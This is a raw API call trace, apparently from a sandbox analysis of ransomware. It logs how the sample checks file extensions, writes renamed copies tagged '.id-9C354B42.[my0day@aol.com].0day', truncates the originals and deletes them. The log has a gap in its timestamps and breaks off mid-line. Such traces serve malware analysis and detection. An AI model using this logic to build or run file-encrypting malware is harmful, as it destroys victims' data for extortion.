[0054.134] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0054.134] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0054.134] lstrlenW (lpString=".doc") returned 4 [0054.134] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0054.134] lstrlenW (lpString=".docx") returned 5 [0054.134] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0054.134] lstrlenW (lpString=".pdf") returned 4 [0054.134] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0054.134] lstrlenW (lpString=".xls") returned 4 [0054.134] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0054.134] lstrlenW (lpString=".xlsx") returned 5 [0054.134] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0054.134] lstrlenW (lpString=".ppt") returned 4 [0054.135] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0054.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0054.135] lstrlenW (lpString=".zip") returned 4 [0054.135] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0054.135] lstrlenW (lpString=".rar") returned 4 [0054.135] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0054.135] lstrlenW (lpString=".bz2") returned 4 [0054.135] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0054.135] lstrlenW (lpString=".7z") returned 3 [0054.135] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0054.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0054.135] lstrlenW (lpString=".dbf") returned 4 [0054.135] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0054.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0054.135] lstrlenW (lpString=".1cd") returned 4 [0054.135] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0054.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0054.135] lstrlenW (lpString=".jpg") returned 4 [0054.135] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0054.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0054.135] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0054.135] lstrlenW (lpString=".doc") returned 4 [0054.135] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0054.135] lstrlenW (lpString=".docx") returned 5 [0054.135] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0054.135] lstrlenW (lpString=".pdf") returned 4 [0054.135] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0054.135] lstrlenW (lpString=".xls") returned 4 [0054.135] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0054.135] lstrlenW (lpString=".xlsx") returned 5 [0054.135] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0054.135] lstrlenW (lpString=".ppt") returned 4 [0054.136] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0054.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0054.136] lstrlenW (lpString=".zip") returned 4 [0054.136] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0054.136] lstrlenW (lpString=".rar") returned 4 [0054.136] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0054.136] lstrlenW (lpString=".bz2") returned 4 [0054.136] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0054.136] lstrlenW (lpString=".7z") returned 3 [0054.136] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0054.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0054.136] lstrlenW (lpString=".dbf") returned 4 [0054.136] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0054.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0054.136] lstrlenW (lpString=".1cd") returned 4 [0054.136] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0054.136] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\da-DK\\tipresx.dll.mui") returned 72 [0054.136] lstrlenW (lpString=".jpg") returned 4 [0054.136] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0054.136] lstrcmpiW (lpString1=".mui", lpString2=".0day") returned 1 [0054.136] lstrlenW (lpString="tipresx.dll.mui") returned 15 [0054.136] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a8 [0054.959] GetFileSizeEx (in: hFile=0x1a8, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=4096) returned 1 [0054.959] CloseHandle (hObject=0x1a8) returned 1 [0054.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui")) returned 0x20 [0054.959] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0054.959] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\de-de\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0054.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0054.959] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0054.959] lstrlenW (lpString=".doc") returned 4 [0054.959] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0054.959] lstrlenW (lpString=".docx") returned 5 [0054.959] lstrcmpiW (lpString1=".docx", lpString2="l.mui") returned -1 [0054.959] lstrlenW (lpString=".pdf") returned 4 [0054.959] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0054.959] lstrlenW (lpString=".xls") returned 4 [0054.959] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0054.959] lstrlenW (lpString=".xlsx") returned 5 [0054.960] lstrcmpiW (lpString1=".xlsx", lpString2="l.mui") returned -1 [0054.960] lstrlenW (lpString=".ppt") returned 4 [0054.960] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0054.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0054.960] lstrlenW (lpString=".zip") returned 4 [0054.960] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0054.960] lstrlenW (lpString=".rar") returned 4 [0054.960] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0054.960] lstrlenW (lpString=".bz2") returned 4 [0054.960] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0054.960] lstrlenW (lpString=".7z") returned 3 [0054.960] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0054.960] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\de-DE\\tipresx.dll.mui") returned 72 [0054.960] lstrlenW (lpString=".dbf") returned 4 [0054.960] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0056.562] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=3584) returned 1 [0056.562] CloseHandle (hObject=0x234) returned 1 [0056.562] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui")) returned 0x20 [0056.562] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.562] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\sk-SK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\sk-sk\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0056.563] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.563] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.563] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0056.563] GetLastError () returned 0x0 [0056.563] ReadFile (in: hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x25b50, lpOverlapped=0x0) returned 1 [0056.675] WriteFile (in: hFile=0x214, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0x25b60, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0x25b60, lpOverlapped=0x0) returned 1 [0056.678] ReadFile (in: hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.678] WriteFile (in: hFile=0x214, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.678] SetEndOfFile (hFile=0x214) returned 1 [0056.679] CloseHandle (hObject=0x214) returned 1 [0056.679] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.679] SetEndOfFile (hFile=0x234) returned 1 [0056.680] CloseHandle (hObject=0x234) returned 1 [0056.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.681] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\alrtintl.dll")) returned 1 [0056.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0056.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0056.681] lstrlenW (lpString=".doc") returned 4 [0056.681] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.681] lstrlenW (lpString=".docx") returned 5 [0056.681] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0056.681] lstrlenW (lpString=".pdf") returned 4 [0056.681] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.681] lstrlenW (lpString=".xls") returned 4 [0056.681] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.681] lstrlenW (lpString=".xlsx") returned 5 [0056.681] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0056.681] lstrlenW (lpString=".ppt") returned 4 [0056.681] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.681] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0056.681] lstrlenW (lpString=".zip") returned 4 [0056.681] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.681] lstrlenW (lpString=".rar") returned 4 [0056.681] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.681] lstrlenW (lpString=".bz2") returned 4 [0056.682] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.682] lstrlenW (lpString=".7z") returned 3 [0056.682] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0056.682] lstrlenW (lpString=".dbf") returned 4 [0056.682] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0056.682] lstrlenW (lpString=".1cd") returned 4 [0056.682] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0056.682] lstrlenW (lpString=".jpg") returned 4 [0056.682] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0056.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0056.682] lstrlenW (lpString=".doc") returned 4 [0056.682] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0056.682] lstrlenW (lpString=".docx") returned 5 [0056.682] lstrcmpiW (lpString1=".docx", lpString2="L.DLL") returned -1 [0056.682] lstrlenW (lpString=".pdf") returned 4 [0056.682] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0056.682] lstrlenW (lpString=".xls") returned 4 [0056.682] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0056.682] lstrlenW (lpString=".xlsx") returned 5 [0056.682] lstrcmpiW (lpString1=".xlsx", lpString2="L.DLL") returned -1 [0056.682] lstrlenW (lpString=".ppt") returned 4 [0056.682] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0056.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0056.682] lstrlenW (lpString=".zip") returned 4 [0056.682] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0056.682] lstrlenW (lpString=".rar") returned 4 [0056.682] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0056.682] lstrlenW (lpString=".bz2") returned 4 [0056.683] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0056.683] lstrlenW (lpString=".7z") returned 3 [0056.683] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0056.683] lstrlenW (lpString=".dbf") returned 4 [0056.683] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0056.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0056.683] lstrlenW (lpString=".1cd") returned 4 [0056.683] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ALRTINTL.DLL") returned 73 [0056.683] lstrlenW (lpString=".jpg") returned 4 [0056.683] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.684] lstrcmpiW (lpString1=".IDX_DLL", lpString2=".0day") returned 1 [0056.684] lstrlenW (lpString="MSOINTL.DLL.IDX_DLL") returned 19 [0056.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0056.685] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=55680) returned 1 [0056.685] CloseHandle (hObject=0x234) returned 1 [0056.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll")) returned 0x20 [0056.685] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0056.685] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0056.685] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.685] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.685] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0056.686] GetLastError () returned 0x0 [0056.686] ReadFile (in: hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0xd980, lpOverlapped=0x0) returned 1 [0056.717] WriteFile (in: hFile=0x214, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xd990, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xd990, lpOverlapped=0x0) returned 1 [0056.718] ReadFile (in: hFile=0x234, lpBuffer=0x3a60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x301fed4, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesRead=0x301fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.718] WriteFile (in: hFile=0x214, lpBuffer=0x3a60020*, nNumberOfBytesToWrite=0xfa, lpNumberOfBytesWritten=0x301fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3a60020*, lpNumberOfBytesWritten=0x301fc9c*=0xfa, lpOverlapped=0x0) returned 1 [0056.718] SetEndOfFile (hFile=0x214) returned 1 [0056.719] CloseHandle (hObject=0x214) returned 1 [0056.719] SetFilePointerEx (in: hFile=0x234, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x301fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.719] SetEndOfFile (hFile=0x234) returned 1 [0056.721] CloseHandle (hObject=0x234) returned 1 [0056.721] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0056.721] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\msointl.dll.idx_dll")) returned 1 [0056.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0056.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0056.722] lstrlenW (lpString=".doc") returned 4 [0056.722] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0056.722] lstrlenW (lpString=".docx") returned 5 [0056.722] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0056.722] lstrlenW (lpString=".pdf") returned 4 [0056.722] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0056.722] lstrlenW (lpString=".xls") returned 4 [0056.722] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0056.722] lstrlenW (lpString=".xlsx") returned 5 [0056.722] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0056.722] lstrlenW (lpString=".ppt") returned 4 [0056.722] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0056.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0056.722] lstrlenW (lpString=".zip") returned 4 [0056.722] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0056.722] lstrlenW (lpString=".rar") returned 4 [0056.722] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0056.722] lstrlenW (lpString=".bz2") returned 4 [0056.722] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0056.722] lstrlenW (lpString=".7z") returned 3 [0056.722] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0056.722] lstrlenW (lpString=".dbf") returned 4 [0056.722] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0056.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0056.722] lstrlenW (lpString=".1cd") returned 4 [0056.722] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0056.722] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0056.723] lstrlenW (lpString=".jpg") returned 4 [0056.723] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0056.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0056.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0056.723] lstrlenW (lpString=".doc") returned 4 [0056.723] lstrcmpiW (lpString1=".doc", lpString2="_DLL") returned -1 [0056.723] lstrlenW (lpString=".docx") returned 5 [0056.723] lstrcmpiW (lpString1=".docx", lpString2="X_DLL") returned -1 [0056.723] lstrlenW (lpString=".pdf") returned 4 [0056.723] lstrcmpiW (lpString1=".pdf", lpString2="_DLL") returned -1 [0056.723] lstrlenW (lpString=".xls") returned 4 [0056.723] lstrcmpiW (lpString1=".xls", lpString2="_DLL") returned -1 [0056.723] lstrlenW (lpString=".xlsx") returned 5 [0056.723] lstrcmpiW (lpString1=".xlsx", lpString2="X_DLL") returned -1 [0056.723] lstrlenW (lpString=".ppt") returned 4 [0056.723] lstrcmpiW (lpString1=".ppt", lpString2="_DLL") returned -1 [0056.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0056.723] lstrlenW (lpString=".zip") returned 4 [0056.723] lstrcmpiW (lpString1=".zip", lpString2="_DLL") returned -1 [0056.723] lstrlenW (lpString=".rar") returned 4 [0056.723] lstrcmpiW (lpString1=".rar", lpString2="_DLL") returned -1 [0056.723] lstrlenW (lpString=".bz2") returned 4 [0056.723] lstrcmpiW (lpString1=".bz2", lpString2="_DLL") returned -1 [0056.723] lstrlenW (lpString=".7z") returned 3 [0056.723] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0056.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0056.723] lstrlenW (lpString=".dbf") returned 4 [0056.723] lstrcmpiW (lpString1=".dbf", lpString2="_DLL") returned -1 [0056.723] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0056.723] lstrlenW (lpString=".1cd") returned 4 [0056.724] lstrcmpiW (lpString1=".1cd", lpString2="_DLL") returned -1 [0056.724] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSOINTL.DLL.IDX_DLL") returned 80 [0056.724] lstrlenW (lpString=".jpg") returned 4 [0056.724] lstrcmpiW (lpString1=".jpg", lpString2="_DLL") returned -1 [0056.724] lstrcmpiW (lpString1=".DLL", lpString2=".0day") returned 1 [0056.724] lstrlenW (lpString="MSSOAPR3.DLL") returned 12 [0056.724] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0056.803] GetFileSizeEx (in: hFile=0x234, lpFileSize=0x301ff1c | out: lpFileSize=0x301ff1c*=41864) returned 1 [0056.803] CloseHandle (hObject=0x234) returned 1 [0056.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\mssoapr3.dll")) returned 0x20 [0056.803] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\MSSOAPR3.DLL.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\common files\\microsoft 